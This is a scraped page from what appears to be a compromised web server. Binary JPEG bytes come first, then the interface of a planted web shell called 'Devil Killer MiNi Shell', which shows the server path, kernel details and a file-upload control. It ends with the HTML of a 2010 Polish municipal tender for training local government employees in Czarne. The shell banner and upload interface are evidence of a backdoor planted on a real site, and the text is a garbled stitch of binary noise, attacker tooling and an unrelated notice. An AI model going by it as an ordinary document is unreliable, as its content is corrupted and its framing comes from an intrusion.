JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100419/110620-N-2010.html

<p class="kh_header"><b>Czarne: Zorganizowanie i przeprowadzenie szkoleń pracowników samorządowych, projektu pt: Sprawnie funkcjonująca administracja samorządowa gwarancją konkurencyjności gmin powiatu bytowskiego i człuchowskiego, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V. Dobre rządzenie, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1. Modernizacja zarządzania w administracji samorządowej, projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 110620 - 2010; data zamieszczenia: 19.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy , ul. Moniuszki 12, 77-330 Czarne, woj. pomorskie, tel. 059 8332078.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.czarne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń pracowników samorządowych, projektu pt: Sprawnie funkcjonująca administracja samorządowa gwarancją konkurencyjności gmin powiatu bytowskiego i człuchowskiego, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V. Dobre rządzenie, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1. Modernizacja zarządzania w administracji samorządowej, projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń pracowników samorządowych, projektu pt: Sprawnie funkcjonująca administracja samorządowa gwarancją konkurencyjności gmin powiatu bytowskiego i człuchowskiego, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V. Dobre rządzenie, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1. Modernizacja zarządzania w administracji samorządowej, projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w następujących zadaniach tematycznych:
Część I.  Szkolenie pt: Dyscyplina finansów publicznych oraz jej naruszenie
Termin: maj 2010, szkolenie 3-dniowe po 8 godzin lekcyjnych dziennie.
Łączna liczba osób: 24, dla 2 grup szkoleniowych w miejscowościach: Miastko i Lipnica.
Program szkolenia:
I. Dyscyplina finansów publicznych w zakresie procesów gromadzenia środków - znaczące zmiany:
- nowe zasady umarzania należności. Należności cywilnoprawne i publicznoprawne,
- ustalanie odsetek od nieterminowych płatności, 
- egzekucja należności a dyscyplina finansów publicznych. Dopuszczalność ugody,
- nieprawidłowości przy dochodzeniu i pobieraniu należności,
- nieprawidłowości przy ustalaniu należności, 
- nieprzekazywanie dochodów do budżetu a zmiany organizacyjne w sektorze publicznym.
- kary umowne a dyscyplina finansów publicznych.
II. Dyscyplina finansów publicznych w zakresie zaciągania zobowiązań i dokonywania wydatków w świetle nowej ustawy o finansach publicznych: 
- planowanie wieloletnie a dyscyplina finansów publicznych,
- przekroczenie upoważnienia do dokonywania wydatków, 
- zaciąganie zobowiązań z przekroczeniem upoważnienia,
- nieprawidłowości związane z wydatkami i zobowiązaniami,  
- niewykonywanie zobowiązań, 
- nieprawidłowości związane z inwentaryzacją i sprawozdaniami finansowymi.
- nieprawidłowości w dokonywaniu zmian w planie finansowym.
III. Dyscyplina finansów publicznych w gospodarowania środkami UE: 
- naruszenie dyscypliny finansów publicznych polegające na przekazaniu środków niezgodnie z procedurami,
- zasady prawidłowego wykorzystania i rozliczenia dotacji rozwojowych, 
- dodatkowe sankcje z tytułu nieprawidłowości w wykorzystaniu środków zagranicznych a dyscyplina finansów publicznych w nowej ustawie o finansach publicznych, 
- zasady zwrotu środków przez beneficjenta. Wielkość i sposób dokonania zwrotu środków,
- jak oceniać wykorzystane środków niezgodnie z przeznaczeniem.
IV. Dyscyplina finansów publicznych w kontroli zarządczej: 
- kontrola zarządcza a kontrola finansowa i audyt,
- zakres kontroli zarządczej, 
- standardy kontroli zarządczej, 
- odpowiedzialność kierownika i głównego księgowego w zakresie kontroli zarządczej, 
- procedury wewnętrzne dotyczące kontroli zarządczej w świetle nowych przepisów a dyscyplina finansów publicznych,
- dopuszczenie do dokonania wydatku przekraczającego plan wskutek zaniedbania kontroli zarządczej, 
- dopuszczenie do uszczuplenia należnych wpływów  wskutek zaniedbania kontroli zarządczej,
- dopuszczenie do niewykonania zobowiązania jednostki wskutek zaniedbania kontroli zarządczej, 
- dopuszczenie do nieprawidłowości w ramach zamówień publicznych wskutek zaniedbania kontroli zarządczej, 
V. Zmiany w zakresie odpowiedzialności za naruszenie dyscypliny finansów publicznych w zamówieniach publicznych oraz postępowaniach o udzielenie koncesji na roboty budowlane lub usługi: 
- Zmiany w zakresie odpowiedzialności w zakresie wyboru trybu udzielania zamówienia publicznego,
- Dyscyplina w zakresie opisu przedmiotu i warunków zamówienia w sposób naruszający zasady uczciwej konkurencji po nowelizacji Prawa zamówień publicznych,
- Nieprawidłowości przy dokonywaniu zmian umowy, 
- Odpowiedzialność za naruszenie dyscypliny finansów publicznych w zamówieniach publicznych do 14 tys. Euro. 
VI. Odpowiedzialność  za naruszenie dyscypliny finansów publicznych a inne odpowiedzialności prawnej: odpowiedzialność karna, karna skarbowa, cywilna prawnicza.
VII. Kary za naruszenie dyscypliny finansowej i dyrektywy ich wymiaru: upomnienie, nagana, kara pieniężna, zakaz pełnienia funkcji związanych z dysponowaniem środkami publicznymi.
VIII. Dyskusja z uczestnikami szkolenia, analiza przykładów oraz wymiana doświadczeń.

Część II. Szkolenie pt: Gospodarka wodno - ściekowa w świetle ustawy Prawo wodne oraz aktów wykonawczych i Prawa ochrony środowiska
Termin: maj 2010, szkolenie 2-dniowe po 8 godzin lekcyjnych dziennie.
Łączna liczba osób: 18, dla 1 grupy szkoleniowej w miejscowości Miastko.
Program szkolenia:
I. Korzystanie z wód, prawa i obowiązki właścicieli wód i urządzeń wodnych, pozwolenia wodno prawne na wprowadzanie ścieków:
- własność wód: podział wód, prawa i obowiązki właścicieli wód, partycypacja w kosztach utrzymania wód, zasady nabywania praw do użytkowania gruntów pokrytych wodami Skarbu Państwa,
- korzystanie z wód: zasady korzystania z wód, prawa i obowiązki podmiotów w zakresie powszechnego, zwykłego i szczególnego korzystania z wód,
- ochrona wód: zakazy dotyczące wprowadzania ścieków do wód lub do ziemi, z uwzględnieniem rodzaju ścieków i ich odbiornika, zaostrzanie i łagodzenie warunków wprowadzania ścieków,
- pozwolenia wodno prawne: właściwość organów administracji publicznej do wydawania pozwoleń wodno prawnych, zwolnienia z obowiązku posiadania pozwolenia, wniosek i dokumenty wymagane w postępowaniu o wydanie pozwolenia wodno prawnego, strony w postępowaniu wodno prawnym, udział organizacji społecznych w postępowaniu wodno prawnym, prawa i obowiązki wynikające z pozwolenia wodno prawnego, następstwo prawne oraz przeniesienie praw i obowiązków wynikających z pozwolenia wodno prawnego,
- warunki wprowadzania ścieków z uwzględnieniem rodzaju ścieków i ich odbiornika,
- zaostrzanie i łagodzenie warunków wprowadzania ścieków.
II. Prawa własności wód i gruntów pokrytych wodami, budownictwo wodne, odpowiedzialność za szkody:
- prawo własności wód oraz gruntów pokrytych wodami powierzchniowymi,
ustalanie linii brzegu,
- obowiązki właścicieli wód oraz innych nieruchomości,
- budownictwo wodne: obowiązki właścicieli urządzeń wodnych, partycypacja w kosztach utrzymania urządzeń wodnych, legalizacja urządzeń wodnych,
- ochrona przed powodzią, w tym obszary bezpośredniego zagrożenia powodzią,
instrukcja gospodarowania wodą,
- odpowiedzialność za szkody,
III. Dyskusja z uczestnikami szkolenia, analiza przykładów oraz wymiana doświadczeń.

Część III. Szkolenie pt: Rola i znaczenie planów zagospodarowania przestrzennego, renta planistyczna, opłata adiacencka za podział i uzbrojenie w świetle nowych uregulowań prawnych
Termin: czerwiec 2010r, szkolenie 3-dniowe po 8 godzin lekcyjnych dziennie.
Łączna liczba osób: 22, dla 2 grup szkoleniowych w miejscowościach: Czarne i Bytów.
Program szkolenia:
I. Skrótowe omówienie najnowszych zmian w odpowiednich przepisach ustawy o gospodarce nieruchomościami oraz ustawy o planowaniu  i zagospodarowaniu przestrzennym.
II. Rola i znaczenie planów zagospodarowania przestrzennego.
III. Renta planistyczna:  
- przesłanki naliczenia renty planistycznej, 
- tryb i zasady ustalania wysokości renty planistycznej, 
- sposoby uiszczenia renty planistycznej oraz zasady egzekucji: uchwalenie planu, zmiany planu, wzrost wartości nieruchomości, zbycie nieruchomości - co to oznacza, przedawnienie.
IV. Opłata adiacencka z tytułu podziału nieruchomości: przesłanki naliczenia opłaty adiacenckiej, tryb i zasady ustalania wysokości opłaty adiacenckiej, sposoby uiszczenia opłaty adiacenckiej. Przedstawienie podstawowych problemów praktycznych i zmian w przepisach oraz ich omówienie.
V. Opłata adiacencka z tytułu budowy infrastruktury technicznej: przesłanki naliczenia opłaty adiacenckiej, tryb i zasady ustalania wysokości opłaty adiacenckiej, sposoby uiszczenia opłaty adiacenckiej. Przedstawienie podstawowych problemów praktycznych i zmian w przepisach oraz ich omówienie.
VI. Podstawowe wady uchwał rad gmin w sprawie ustalenia stawki opłaty adiacenckiej.
VII. Egzekucja opłat z tytułu renty planistycznej i opłaty adiacenckiej.
VIII. Dyskusja z uczestnikami szkolenia, analiza przykładów oraz wymiana doświadczeń.

Część IV. Szkolenie pt: Profesjonalna Obsługa Petenta w urzędzie
Termin: lipiec 2010r., szkolenie 2-dniowe po 8 godzin lekcyjnych dziennie.
Łączna liczba osób: 39 dla 2 grup szkoleniowych w miejscowości: Bytów.
Program szkolenia:
I. Sylwetka pracownika administracji publicznej:
- zadania i obowiązki pracownika,
- reprezentacyjna i informacyjna funkcja pracownika,
- pierwsze wrażenie i jego rola w procesie budowania relacji z Petentem,
- wygląd a zachowanie osoby będącej wizytówka urzędu,
- rola komunikacji niewerbalnej w obsłudze- mowa ciała,
II. Zasady skutecznej komunikacji w urzędzie:
- style prowadzenia obsługi,
- przyczyny zaburzeń w sferze komunikacji,
- techniki aktywnego słuchania, 
- w jaki sposób przekonać do siebie trudnego klienta, 
- dlaczego klient bywa trudny i jak sobie z nim poradzić,
- metody radzenia sobie z trudnym klientem-ćwiczenia,
- podstawowe zasady obsługi Petenta
- oczekiwania Petenta.
III. Techniki wyłaniania potrzeb Petenta oraz poszukiwanie skutecznych rozwiązań:
- zbieranie informacji na podstawie obserwacji i rozmowy z Petentami,
- typologia Petentów i umiejętność dopasowania się do rozmówcy,
- skuteczna komunikacja w urzędzie,
- techniki aktywnego słuchania,
- techniki zadawania pytań, parafrazowania,
- sterowanie rozmową - kreatywny scenariusz rozmowy,
- bariery w komunikacji i sposoby ich przełamywania,
- asertywność w kontaktach z Petentami,
- etyczne metody wpływu na Klienta, które można stosować bez szkody dla długofalowych reakcji.
IV. Budowanie efektywnego kontaktu przez telefon:
- jak się zachowywać zanim podniesiesz słuchawkę(powitanie, poznanie potrzeb klienta, przełączenie rozmowy telefonicznej do innego pracownika, przełączenie rozmówcy w stan oczekiwania,
- przekazanie informacji osobie dzwoniącej, zakończenie rozmowy)
- prowadzenie telefonicznej rozmowy z Petentem
- zbieranie i udzielanie informacji przez telefon,
- przekazywanie wiadomości,
- operowanie głosem.
V. Reakcja na zastrzeżenia i reklamacje:
- reakcja na obiekcje, zastrzeżenia i reklamacje i sposoby radzenia sobie z nimi,
- reakcja na krytykę lub odmowę,
- umiejętność dystansowania się i oddzielenie intencji od zachowań,
- sposoby radzenia sobie ze stresem na stanowisku pracy,
- analiza przyczyn niepowodzeń w kontaktach z Petentami.
VI. Zarządzanie czasem i zadaniami w administracji publicznej:
- organizacja czasu pracy,
- ustalanie priorytetów,
- planowanie zadań do wykonania,
- sposoby radzenia sobie ze stresem na stanowisku pracy.
VII. Dyskusja z uczestnikami szkolenia, analiza przykładów oraz wymiana doświadczeń.

2.Przedmiot zamówienia realizowany jest w ramach umowy partnerstwa na rzecz realizacji projektu pn: Sprawnie funkcjonująca administracja samorządowa gwarancją konkurencyjności gmin powiatu bytowskiego i człuchowskiego zawartej pomiędzy gminami: Czarne, Człuchów, Bytów, Lipnica, Tuchomie, Miastko, gdzie Liderem projektu wyznaczono Zamawiającego działającego z upoważnienia pozostałych partnerów projektu.

3.Wykonawca:
1) realizuje przedmiot zamówienia w dni robocze od poniedziałku do piątku w czasie godzin pracy pracowników u poszczególnych partnerów projektu, a więc w: Urzędzie Miasta i Gminy Czarne, Urzędzie Miejskim w Miastku, Urzędzie Miejskim w Bytowie, Urzędzie Gminy w Lipnicy. 
Osobami wyznaczonymi do kontaktu są:
a) Gmina Czarne - Wioletta Marek, tel. (059) 83 32 079,
b) Gmina Bytów - Hanna Jagodzińska, tel. (059) 82 22 011
c) Gmina Lipnica - Michał Świontek-Brzeziński, tel. (059) 82 17 082
d) Gmina Miastko - Lucja Zmuda Trzebiatowska, tel. (059) 85 72 081
2) realizuje przedmiot zamówienia - poszczególne zadania, po szczegółowych uzgodnieniach z partnerami Zamawiającego wg miejsca odbywania szkolenia,
3) zapewnia przerwy każda po 15 minut, z jedną dłuższą przerwą na spożycie posiłku. Łączny czas trwania szkolenia nie może być dłuższy jak 8 godzin oraz zapewni uczestnikom szkolenia catering tj. kawa, herbata, woda mineralna, ciastka oraz minimum jeden ciepły posiłek składający się z drugiego dania obiadowego w przypadku gdy szkolenie trwa 8 godzin,
4) zapewni materiały dydaktyczne i piśmienne dla uczestników szkolenia, które po zakończeniu szkolenia przejdą na ich własność (natomiast materiały promocyjne w postaci długopisów, notesów, teczek na dokumenty, plakatów informacyjnych zabezpieczy Zamawiający i będą one w dyspozycji u partnerów projektu - osoby wymienionej w SIWZ, w miejscu odbywania się szkolenia). Po zakończeniu szkolenia każdy z uczestników otrzyma dokument potwierdzający jego odbycie, zawierający oznaczenia zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki (logotypy) z podpisem trenera,
5) zobowiązany jest do przeprowadzenia testów ewaluacyjnych wśród uczestników szkolenia przed i na zakończenie szkolenia oraz ankiety oceniającej jakość szkolenia wg wzoru Zamawiającego. Wykonawca sporządzi raport z odbytego szkolenia, który zawierać będzie ocenę efektywności tego szkolenia. 
6) zapewni odpowiednią kadrę dydaktyczną do przeprowadzenia szkolenia,
7) zapewni uczestnikom szkolenia odpowiednie warunki lokalowe i wyposażenie techniczne, adekwatne do rodzaju szkolenia, odpowiadające indywidualnym potrzebom szkoleniowym uczestników,
8) oznaczy pomieszczenia w których realizowany jest przedmiot zamówienia w sposób zgodny z wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki,
9) trener prowadzący szkolenie podpisze wykazy ukończonych szkoleń uczestników danego szkolenia przygotowanych i przedłożonych  przez biuro projektu.
3. Zamawiający zastrzega sobie prawo zmiany terminu i programu szkolenia nie później niż 14 dni przed terminem określonym w SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w przedmiotowym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wymienione warunki</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentowane, że te usługi zostały wykonane lub są wykonywane należycie minimum 2 zamówienia publiczne o podobnych zamówieniach w jednostkach samorządu terytorialnego lub usług o podobnym zakresie przedmiotu zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują lub będą dysponować osobą zdolną do wykonania usługi szkolenia na poszczególne części przedmiotu zamówienia posiadającymi minimum 3 letnie doświadczenie w nauczaniu z zakresu objętego zamówieniem, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">kserokopię potwierdzoną za zgodność z oryginałem zaświadczenia o wpisie do Rejestru Instytucji Szkoleniowych wydanego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - doświadczenie Wykonawcy w realizacji szkoleń zgodnych z przedmiotem zamówienia w okresie ostatnich trzech lat - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>dokonania zmiany umowy - jego załącznika, z przyczyn niezależnych od Wykonawcy np. zdarzenia losowe, na pisemny uzasadniony wniosek Wykonawcy. Zmiana może dotyczyć wyłącznie załącznika nr 4 do SIWZ a więc Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
